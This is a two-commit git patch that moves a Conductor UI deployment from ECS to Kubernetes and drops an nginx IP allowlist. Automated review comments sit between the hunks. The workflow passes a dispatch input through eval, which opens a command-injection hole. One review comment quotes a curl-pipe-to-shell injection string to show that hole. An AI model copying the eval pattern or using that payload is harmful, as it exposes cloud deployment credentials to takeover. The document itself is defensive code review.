From 30f94d8343036e3e0df983673b579f80b462fed5 Mon Sep 17 00:00:00 2001 From: Gayathridevi S Date: Tue, 18 Mar 2025 16:27:08 +0530 Subject: [PATCH 1/2] changed ci cd pipeline for conductor ui --- .github/workflows/cd-ui.yaml | 99 ++++++++++++++++-------------------- ui/default-dev.conf | 6 +-- ui/default-prd.conf | 6 +-- ui/default-stg.conf | 6 +-- 4 files changed, 54 insertions(+), 63 deletions(-) diff --git a/.github/workflows/cd-ui.yaml b/.github/workflows/cd-ui.yaml index 3609423632..29b6861b76 100644 --- a/.github/workflows/cd-ui.yaml +++ b/.github/workflows/cd-ui.yaml @@ -15,10 +15,15 @@ on: required: true type: string description: Provide tag (Eg:v3.14.0) - +permissions: + id-token: write + contents: write + packages: read + actions: read env: SERVICE_NAME: conductor-ui AWS_REGION: "ap-south-1" + HELM_CHART_NAME: "application-helm-chart" jobs: prepare-env: @@ -29,13 +34,12 @@ jobs: AWS_ROLE: ${{ steps.vars.outputs.AWS_ROLE }} ENV: ${{ steps.vars.outputs.ENV }} PROJECT_PREFIX: ${{ steps.vars.outputs.PROJECT_PREFIX }} - ECS_CLUSTER: ${{ steps.set_env.outputs.ECS_CLUSTER }} - ECS_SERVICE: ${{ steps.set_env.outputs.ECS_SERVICE }} - TASK_DEFINITION: ${{ steps.set_env.outputs.TASK_DEFINITION }} - CONTAINER_NAME: ${{ steps.set_env.outputs.CONTAINER_NAME }} + K8S_CLUSTER: ${{ steps.set_env.outputs.K8S_CLUSTER }} ECR_REPOSITORY: ${{ steps.set_env.outputs.ECR_REPOSITORY }} + ENVIRONMENT_BUCKET: ${{ steps.set_env.outputs.ENVIRONMENT_BUCKET }} SLACK_WEBHOOK_URL: ${{ steps.vars.outputs.SLACK_WEBHOOK_URL }} - + AWS_ACCOUNT_ID: ${{ steps.vars.outputs.AWS_ACCOUNT_ID}} + steps: - id: vars shell: bash @@ -44,7 +48,7 @@ jobs: ENV=${{ github.event.inputs.environment }} IMAGE_TAG=${{ github.event.inputs.tag }} echo $BRANCH - + if [ -z "$ENV" ] then case $BRANCH in 
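Review bot: The new workflow-level `permissions:` block grants `contents: write` (with `id-token: write`, `packages: read`, `actions: read`) to every job that does not override it, yet nothing visible in this file pushes to the repository — the deploy job itself narrows to `contents: read`. Unless `prepare-env` declares its own block outside this view, a job that only computes variable names inherits write access to repo contents and the right to mint OIDC tokens. Apply least privilege at the top, `permissions:` / `  contents: read`, keep `id-token: write` only on the job that assumes the AWS role, and drop `packages: read` and `actions: read` unless a step in this file actually consumes them.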
@@ -67,16 +71,19 @@ jobs:
 echo "AWS_ROLE=PRD_AWS_ROLE" >> $GITHUB_OUTPUT
 echo "PROJECT_PREFIX=sirn-prd-mb" >> $GITHUB_OUTPUT
 echo "SLACK_WEBHOOK_URL=PRD_SLACK_WEBHOOK_URL" >> $GITHUB_OUTPUT
+ echo "AWS_ACCOUNT_ID=PRD_AWS_ACCOUNT_ID" >> $GITHUB_OUTPUT
 elif [ $ENV == 'stg' ]
 then
 echo "AWS_ROLE=STG_AWS_ROLE" >> $GITHUB_OUTPUT
 echo "PROJECT_PREFIX=sirn-stg-mb" >> $GITHUB_OUTPUT
 echo "SLACK_WEBHOOK_URL=DEV_SLACK_WEBHOOK_URL" >> $GITHUB_OUTPUT
+ echo "AWS_ACCOUNT_ID=NON_PRD_AWS_ACCOUNT_ID" >> $GITHUB_OUTPUT
 elif [ $ENV == 'dev' ]
 then
 echo "AWS_ROLE=DEV_AWS_ROLE" >> $GITHUB_OUTPUT
 echo "PROJECT_PREFIX=sirn-dev-mb" >> $GITHUB_OUTPUT
 echo "SLACK_WEBHOOK_URL=DEV_SLACK_WEBHOOK_URL" >> $GITHUB_OUTPUT
+ echo "AWS_ACCOUNT_ID=NON_PRD_AWS_ACCOUNT_ID" >> $GITHUB_OUTPUT
 else
 echo "Branch not configured!"
 exit 1
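Review bot: The added `AWS_ACCOUNT_ID` lines map both `stg` and `dev` to `NON_PRD_AWS_ACCOUNT_ID`, and the deploy job later derives its principal solely as `arn:aws:iam::<account>:role/github-actions`, so staging and development deployments now run as one identical IAM role in one account. Per-environment clusters (`$PROJECT_PREFIX-prime`) suggest the two are meant to be isolated; if so, emit a role name that carries the environment as well, e.g. `echo "AWS_ROLE_NAME=github-actions-$ENV" >> $GITHUB_OUTPUT`, and scope each role's trust policy to the matching GitHub environment or branch. The `if`/`elif` chain this hunk belongs to begins outside the hunk.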
@@ -88,34 +95,27 @@ jobs: id: set_env run: | PROJECT_PREFIX=${{ steps.vars.outputs.PROJECT_PREFIX }} - echo "ECR_REPOSITORY=$PROJECT_PREFIX-ecr-$SERVICE_NAME" >> $GITHUB_OUTPUT - echo "ECS_CLUSTER=$PROJECT_PREFIX-ecs-cluster" >> $GITHUB_OUTPUT - echo "ECS_SERVICE=$PROJECT_PREFIX-svc-$SERVICE_NAME" >> $GITHUB_OUTPUT - echo "TASK_DEFINITION=$PROJECT_PREFIX-td-$SERVICE_NAME" >> $GITHUB_OUTPUT - echo "CONTAINER_NAME=$PROJECT_PREFIX-cntr-$SERVICE_NAME" >> $GITHUB_OUTPUT + echo "K8S_CLUSTER=$PROJECT_PREFIX-prime" >> $GITHUB_OUTPUT + echo "ENVIRONMENT_BUCKET=$PROJECT_PREFIX-s3-environment" >> $GITHUB_OUTPUT echo ":seedling: Branch:${GITHUB_REF#refs/heads/}" >> $GITHUB_STEP_SUMMARY - + echo "ECR_REPOSITORY=$PROJECT_PREFIX-ecr-conductor-ui" >> $GITHUB_OUTPUT + # Deploy Conductor UI Image to ECS - deploy-ui-image: - name: Deploy UI Image - runs-on: 'ubuntu-latest' - timeout-minutes: 20 + deploy-to-k8s: + name: Deploy to k8s + runs-on: ubuntu-latest + container: + image: public.ecr.aws/kvsiren-dev/pipeline/helm-deploy:latest + timeout-minutes: 15 permissions: id-token: write pull-requests: write contents: read - needs: prepare-env + needs: + - prepare-env env: - AWS_ROLE: ${{ needs.prepare-env.outputs.AWS_ROLE }} - ENV: ${{ needs.prepare-env.outputs.ENV }} - PROJECT_PREFIX: ${{needs.prepare-env.outputs.PROJECT_PREFIX}} - ECR_REPOSITORY: ${{needs.prepare-env.outputs.ECR_REPOSITORY}} - IMAGE_TAG: ${{ github.event.inputs.tag }} - ECS_CLUSTER: ${{ needs.prepare-env.outputs.ECS_CLUSTER }} - ECS_SERVICE: ${{ needs.prepare-env.outputs.ECS_SERVICE }} - TASK_DEFINITION: ${{ needs.prepare-env.outputs.TASK_DEFINITION }} - CONTAINER_NAME: ${{ needs.prepare-env.outputs.CONTAINER_NAME }} - + AWS_ACCOUNT_ID: ${{ needs.prepare-env.outputs.AWS_ACCOUNT_ID }} + ECR_REPOSITORY: ${{ needs.prepare-env.outputs.ECR_REPOSITORY }} steps: - name: Checkout code from action uses: actions/checkout@v2 
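Review bot: The new `deploy-to-k8s` job runs every step inside `public.ecr.aws/kvsiren-dev/pipeline/helm-deploy:latest`, and that container is what receives the OIDC-assumed AWS credentials, the EKS kubeconfig and the Helm registry login; with a mutable `latest` tag, whoever can push to that public repository changes what executes with those credentials without touching this workflow. Pin it by digest, `image: public.ecr.aws/kvsiren-dev/pipeline/helm-deploy@sha256:<digest>`, and bump it deliberately. In the same hunk `ECR_REPOSITORY` is now assembled from the literal `conductor-ui` while the sibling outputs use `$SERVICE_NAME`; `echo "ECR_REPOSITORY=$PROJECT_PREFIX-ecr-$SERVICE_NAME" >> $GITHUB_OUTPUT` keeps them consistent. The surviving `# Deploy Conductor UI Image to ECS` comment is stale now that the target is Kubernetes.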
@@ -123,33 +123,24 @@ jobs: - name: Configure AWS credentials uses: aws-actions/configure-aws-credentials@v4 with: - role-to-assume: ${{ secrets[env.AWS_ROLE] }} + role-to-assume: arn:aws:iam::${{ vars[env.AWS_ACCOUNT_ID] }}:role/github-actions aws-region: ${{ env.AWS_REGION }} - - name: Amazon ECR Login - id: login-ecr - uses: aws-actions/amazon-ecr-login@v1.7.0 + - name: Deploy to Kubernetes + shell: bash + run: | + aws eks update-kubeconfig --name ${{ needs.prepare-env.outputs.K8S_CLUSTER }} + aws s3 cp s3://${{ needs.prepare-env.outputs.ENVIRONMENT_BUCKET }}/helm/${{ env.SERVICE_NAME }}/values.yaml ./values.yaml + cat ./values.yaml + aws ecr get-login-password --region ${{ env.AWS_REGION }} | helm registry login --username AWS --password-stdin ${{ vars[env.AWS_ACCOUNT_ID] }}.dkr.ecr.${{ env.AWS_REGION }}.amazonaws.com - - name: Check if image tag exists in ECR - id: check-image-existence - run: | - if aws ecr describe-images --repository-name "${{ env.ECR_REPOSITORY }}" --region "${{ env.AWS_REGION }}" --image-ids imageTag="${{ env.IMAGE_TAG }}" 2>&1 | grep -q "imageTag"; then - echo "Image tag $IMAGE_TAG exists in ECR" - else - echo "Error: Image tag $IMAGE_TAG does not exist in ECR" - exit 1 - fi + # Construct base Helm command + HELM_CMD="helm upgrade --install ${{ env.SERVICE_NAME }} oci://${{ vars[env.AWS_ACCOUNT_ID] }}.dkr.ecr.${{ env.AWS_REGION }}.amazonaws.com/${{ env.HELM_CHART_NAME }} \ + --namespace ${{ needs.prepare-env.outputs.ENV }} \ + --values values.yaml \ + --set default.image.repository='${{ vars[env.AWS_ACCOUNT_ID] }}.dkr.ecr.${{ env.AWS_REGION }}.amazonaws.com/${{ env.ECR_REPOSITORY }}' \ + --set default.image.tag='${{ github.event.inputs.tag }}'" - - name: Deploy backend - id: deploy_backend - uses: ./.github/actions/deploy-ecs - env: - APP_IMAGE: ${{ steps.login-ecr.outputs.registry }}/${{ env.ECR_REPOSITORY }}:${{ env.IMAGE_TAG }} - with: - aws-region : ${{ env.AWS_REGION }} - aws-role: ${{ secrets[env.AWS_ROLE] }} - task-definition: ${{ 
env.TASK_DEFINITION }}
- container-name: ${{ env.CONTAINER_NAME }}
- ecs-service: ${{ env.ECS_SERVICE }}
- ecs-cluster: ${{ env.ECS_CLUSTER }}
- image: ${{ env.APP_IMAGE }}
\ No newline at end of file
+ # Run the Helm command
+ echo "Running: $HELM_CMD"
+ eval $HELM_CMD
diff --git a/ui/default-dev.conf b/ui/default-dev.conf
index f37c665194..7369e2f3bb 100644
--- a/ui/default-dev.conf
+++ b/ui/default-dev.conf
@@ -32,7 +32,7 @@ server {
 proxy_set_header X-Real-IP $remote_addr;
 proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
 proxy_set_header X-NginX-Proxy true;
- proxy_pass http://sirn-dev-mb-svc-conductor-server.sirn-dev-mb.local:8080/api;
+ proxy_pass http://conductor.dev.svc.cluster.local:8080/api;
 proxy_ssl_session_reuse off;
 proxy_set_header Host $http_host;
 proxy_cache_bypass $http_upgrade;
@@ -43,7 +43,7 @@ server {
 proxy_set_header X-Real-IP $remote_addr;
 proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
 proxy_set_header X-NginX-Proxy true;
- proxy_pass http://sirn-dev-mb-svc-conductor-server.sirn-dev-mb.local:8080/actuator;
+ proxy_pass http://conductor.dev.svc.cluster.local:8080/actuator;
 proxy_ssl_session_reuse off;
 proxy_set_header Host $http_host;
 proxy_cache_bypass $http_upgrade;
@@ -54,7 +54,7 @@ server {
 proxy_set_header X-Real-IP $remote_addr;
 proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
 proxy_set_header X-NginX-Proxy true;
- proxy_pass http://sirn-dev-mb-svc-conductor-server.sirn-dev-mb.local:8080/swagger-ui;
+ proxy_pass http://conductor.dev.svc.cluster.local:8080/swagger-ui;
 proxy_ssl_session_reuse off;
 proxy_set_header Host $http_host;
 proxy_cache_bypass $http_upgrade;
diff --git a/ui/default-prd.conf b/ui/default-prd.conf
index bd2c370c57..8ac3ff74fa 100644
--- a/ui/default-prd.conf
+++ b/ui/default-prd.conf
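Review bot: `eval $HELM_CMD` at the end of the "Deploy to Kubernetes" step executes a string that has `${{ github.event.inputs.tag }}` spliced into it by the template engine before bash runs, so a workflow_dispatch `tag` such as `v1'; curl attacker | sh; echo '` runs arbitrary commands in a job holding the assumed AWS role, the EKS kubeconfig and the Helm registry login — any account allowed to dispatch this workflow gets that access. Every `${{ }}` inside `run:` has this shape (the `eval` only widens it); the fix is to pass dispatch inputs and job outputs through `env:`, reject anything that is not a version tag before the first credentialed call, and invoke `helm` directly with quoted arguments instead of building and `eval`-ing a string. The same step also runs `cat ./values.yaml`, which discloses whatever the environment bucket holds to anyone who can read run logs, and pulls the chart from `oci://…/application-helm-chart` with no `--version`, so a newly pushed chart version changes the deployment with no code change; a `HELM_CHART_VERSION` next to `HELM_CHART_NAME` closes that. The old "Check if image tag exists in ECR" step was dropped with nothing replacing it, which the rewrite below restores alongside `--atomic` so a failed rollout is rolled back rather than left half-applied.
```yaml
      - name: Deploy to Kubernetes
        shell: bash
        env:
          IMAGE_TAG: ${{ github.event.inputs.tag }}
          TARGET_NS: ${{ needs.prepare-env.outputs.ENV }}
          K8S_CLUSTER: ${{ needs.prepare-env.outputs.K8S_CLUSTER }}
          ENVIRONMENT_BUCKET: ${{ needs.prepare-env.outputs.ENVIRONMENT_BUCKET }}
          ACCOUNT_ID: ${{ vars[env.AWS_ACCOUNT_ID] }}
        run: |
          # Only a plain version tag (Eg:v3.14.0, per the input description) may reach the shell or Helm;
          # anything else aborts before any credentialed call. Widen the pattern if tags carry other suffixes.
          [[ "$IMAGE_TAG" =~ ^v[0-9]+\.[0-9]+\.[0-9]+([-.][A-Za-z0-9]+)*$ ]] || { echo "refusing tag: $IMAGE_TAG" >&2; exit 1; }
          REGISTRY="${ACCOUNT_ID}.dkr.ecr.${AWS_REGION}.amazonaws.com"
          # Fail early, as the ECS pipeline did, if the image was never pushed.
          aws ecr describe-images --repository-name "$ECR_REPOSITORY" --region "$AWS_REGION" --image-ids imageTag="$IMAGE_TAG" > /dev/null
          aws eks update-kubeconfig --name "$K8S_CLUSTER"
          aws s3 cp "s3://${ENVIRONMENT_BUCKET}/helm/${SERVICE_NAME}/values.yaml" ./values.yaml   # not printed: it may carry secrets
          aws ecr get-login-password --region "$AWS_REGION" | helm registry login --username AWS --password-stdin "$REGISTRY"
          helm upgrade --install "$SERVICE_NAME" "oci://${REGISTRY}/${HELM_CHART_NAME}" \
            --version "$HELM_CHART_VERSION" \
            --namespace "$TARGET_NS" \
            --values values.yaml \
            --set "default.image.repository=${REGISTRY}/${ECR_REPOSITORY}" \
            --set "default.image.tag=${IMAGE_TAG}" \
            --atomic
```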
@@ -32,7 +32,7 @@ server {
 proxy_set_header X-Real-IP $remote_addr;
 proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
 proxy_set_header X-NginX-Proxy true;
- proxy_pass http://sirn-prd-mb-svc-conductor-server.sirn-prd-mb.local:8080/api;
+ proxy_pass http://conductor.prd.svc.cluster.local:8080/api;
 proxy_ssl_session_reuse off;
 proxy_set_header Host $http_host;
 proxy_cache_bypass $http_upgrade;
@@ -43,7 +43,7 @@ server {
 proxy_set_header X-Real-IP $remote_addr;
 proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
 proxy_set_header X-NginX-Proxy true;
- proxy_pass http://sirn-prd-mb-svc-conductor-server.sirn-prd-mb.local:8080/actuator;
+ proxy_pass http://conductor.prd.svc.cluster.local:8080/actuator;
 proxy_ssl_session_reuse off;
 proxy_set_header Host $http_host;
 proxy_cache_bypass $http_upgrade;
@@ -54,7 +54,7 @@ server {
 proxy_set_header X-Real-IP $remote_addr;
 proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
 proxy_set_header X-NginX-Proxy true;
- proxy_pass http://sirn-prd-mb-svc-conductor-server.sirn-prd-mb.local:8080/swagger-ui;
+ proxy_pass http://conductor.prd.svc.cluster.local:8080/swagger-ui;
 proxy_ssl_session_reuse off;
 proxy_set_header Host $http_host;
 proxy_cache_bypass $http_upgrade;
diff --git a/ui/default-stg.conf b/ui/default-stg.conf
index e057354998..790f159e6f 100644
--- a/ui/default-stg.conf
+++ b/ui/default-stg.conf
@@ -32,7 +32,7 @@ server {
 proxy_set_header X-Real-IP $remote_addr;
 proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
 proxy_set_header X-NginX-Proxy true;
- proxy_pass http://sirn-stg-mb-svc-conductor-server.sirn-stg-mb.local:8080/api;
+ proxy_pass http://conductor.stg.svc.cluster.local:8080/api;
 proxy_ssl_session_reuse off;
 proxy_set_header Host $http_host;
 proxy_cache_bypass $http_upgrade;
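Review bot: `default-prd.conf` (presumably production) keeps proxying `location /actuator` — and `/swagger-ui` in the following hunk — to the Conductor server with nothing in this file restricting the path, and the second patch in this series then deletes the only request-level gate the file had; unless an ingress or auth layer in front of port 5000 blocks these paths, Spring Boot actuator endpoints are reachable unauthenticated in production. The deleted gate keyed on `$http_x_forwarded_for`, a header the client controls unless the edge proxy overwrites it, so it was a weak control to begin with and what replaces it should be a real one rather than a restoration. At minimum narrow the prd config to the probe the UI needs, e.g. `location = /actuator/health { proxy_pass http://conductor.prd.svc.cluster.local:8080/actuator/health; }`, remove the general `/actuator` location, and treat `/swagger-ui` the same way. The `server {}` block these hunks belong to begins and ends outside them.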
@@ -43,7 +43,7 @@ server {
 proxy_set_header X-Real-IP $remote_addr;
 proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
 proxy_set_header X-NginX-Proxy true;
- proxy_pass http://sirn-stg-mb-svc-conductor-server.sirn-stg-mb.local:8080/actuator;
+ proxy_pass http://conductor.stg.svc.cluster.local:8080/actuator;
 proxy_ssl_session_reuse off;
 proxy_set_header Host $http_host;
 proxy_cache_bypass $http_upgrade;
@@ -54,7 +54,7 @@ server {
 proxy_set_header X-Real-IP $remote_addr;
 proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
 proxy_set_header X-NginX-Proxy true;
- proxy_pass http://sirn-stg-mb-svc-conductor-server.sirn-stg-mb.local:8080/swagger-ui;
+ proxy_pass http://conductor.stg.svc.cluster.local:8080/swagger-ui;
 proxy_ssl_session_reuse off;
 proxy_set_header Host $http_host;
 proxy_cache_bypass $http_upgrade;
From 8dea53078722869d5adfe3c0184121e049275b74 Mon Sep 17 00:00:00 2001 From: Gayathridevi S Date: Tue, 18 Mar 2025 18:21:05 +0530 Subject: [PATCH 2/2] removed whitelisting of ips from nginx config --- ui/default-dev.conf | 12 ------------ ui/default-prd.conf | 12 ------------ ui/default-stg.conf | 12 ------------ 3 files changed, 36 deletions(-)
diff --git a/ui/default-dev.conf b/ui/default-dev.conf
index 7369e2f3bb..180f83dee3 100644
--- a/ui/default-dev.conf
+++ b/ui/default-dev.conf
@@ -1,10 +1,3 @@
-map $http_x_forwarded_for $allow {
- default 0;
- "103.138.236.18" 1;
- "103.181.238.106" 1;
- "103.142.30.151" 1;
- "61.2.142.186" 1;
-}
 server {
 listen 5000;
@@ -12,11 +5,6 @@ server {
 server_tokens off;
 location / {
-
- if ($allow != 1) {
- return 401;
- }
-
 add_header Referrer-Policy "strict-origin";
 add_header X-Frame-Options "SAMEORIGIN";
 add_header X-Content-Type-Options "nosniff";
diff --git a/ui/default-prd.conf b/ui/default-prd.conf
index 8ac3ff74fa..256c0cce2c 100644
--- a/ui/default-prd.conf
+++ b/ui/default-prd.conf
@@ -1,10 +1,3 @@
-map $http_x_forwarded_for $allow {
- default 0;
- "103.138.236.18" 1;
- "103.181.238.106" 1;
- "103.142.30.151" 1;
- "61.2.142.186" 1;
-}
 server {
 listen 5000;
@@ -12,11 +5,6 @@ server {
 server_tokens off;
 location / {
-
- if ($allow != 1) {
- return 401;
- }
-
 add_header Referrer-Policy "strict-origin";
 add_header X-Frame-Options "SAMEORIGIN";
 add_header X-Content-Type-Options "nosniff";
diff --git a/ui/default-stg.conf b/ui/default-stg.conf
index 790f159e6f..f88374776e 100644
--- a/ui/default-stg.conf
+++ b/ui/default-stg.conf
@@ -1,10 +1,3 @@
-map $http_x_forwarded_for $allow {
- default 0;
- "103.138.236.18" 1;
- "103.181.238.106" 1;
- "103.142.30.151" 1;
- "61.2.142.186" 1;
-}
 server {
 listen 5000;
@@ -12,11 +5,6 @@ server {
 server_tokens off;
 location / {
-
- if ($allow != 1) {
- return 401;
- }
-
 add_header Referrer-Policy "strict-origin";
 add_header X-Frame-Options "SAMEORIGIN";
 add_header X-Content-Type-Options "nosniff";